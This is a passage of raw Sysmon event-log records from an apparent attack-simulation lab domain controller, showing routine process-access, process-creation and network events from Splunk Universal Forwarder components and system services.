Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:14.957{08A6967A-432D-6000-E700-000000009A01}2468win-dc-250.attackrange.local010.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 22542200x80000000000000004264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:13.990{08A6967A-432D-6000-E700-000000009A01}2468win-dc-2500fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000004263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4330-6000-EB00-000000009A01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4330-6000-EB00-000000009A01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.250{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4330-6000-EB00-000000009A01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:16.251{08A6967A-4330-6000-EB00-000000009A01}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.753{08A6967A-4331-6000-ED00-000000009A01}30603056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4331-6000-ED00-000000009A01}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4331-6000-ED00-000000009A01}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.596{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4331-6000-ED00-000000009A01}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.597{08A6967A-4331-6000-ED00-000000009A01}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 